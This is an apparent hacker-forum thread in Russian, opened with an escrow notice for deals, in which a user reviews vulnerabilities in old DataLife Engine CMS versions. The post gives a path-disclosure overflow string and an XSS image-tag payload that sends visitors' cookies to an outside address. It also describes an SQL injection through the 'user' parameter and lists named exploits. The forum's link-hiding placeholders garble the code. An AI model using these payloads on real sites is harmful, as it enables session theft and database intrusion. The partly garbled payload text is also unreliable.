Уязвимость /datalife Engine/ | Теневой Форум Хакеров
  1. Если желаете провести сделку через гаранта, то пишите в личные сообщения на ник ADMIN, стоимость гаранта 5% Запомните лучше переплатить 5%, чем потерять свои кровные. За сделки без участия гаранта, администрация ответственности за потерю денежных средств не несет.
    Скрыть объявление

Уязвимость /datalife Engine/

Тема в разделе "Обзор уязвимостей DataLife Engine", создана пользователем Kven, 4 мар 2018.

  1. Kven

    Kven Guest

    Обзор уязвимостей [DataLife Engine]


    Сайт производителя: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Актуальная версия: 8.5

    DataLife Engine v.3.7


    [Раскрытие установочного пути]

    В parse.class.php выделено 12582912 байт на проверку сообщения.
    Переполнение делается так: "<<><><><><><>>"

    [ХСС]

    Угнать кукисы можно при помощи вставки картинки.
    -- этим можно воспользваться всегда, даже если нету таких кнопок при
    добавлении новости, личном сообщении, добавления коментария.
    Непосредственно сама ХСС:

    Code:
    [IMG=left]Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!" onmouseover='document.location=" class="fixed">Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!"+document.
    cookie;'><!--[/IMG]
    [Проблемы с SQL]

    Code:
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! -- где topic -- это не существующая тема.
    Результат: SELECT id FROM nws_category WHERE parentid=not detected ;

    Версия 4.1 возможно более ранние SQL Injection.


    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует из-за недостаточной обработки входных данных в параметре "user" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

    Code:
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Код:
    
    DataLife Engine <= 4.1 Remote SQL Injection Exploit (perl)
    DataLife Engine <= 4.1 Remote SQL Injection Exploit (php)
    SQL injection for <=4.1 version exploit
    RGdatalife - exploit (php version)
     
  2. VincentGom

    VincentGom Участник
    Участник

    Регистрация:
    19 апр 2019
    Сообщения:
    2
    Симпатии:
    0
    I congratulate, what words..., a brilliant idea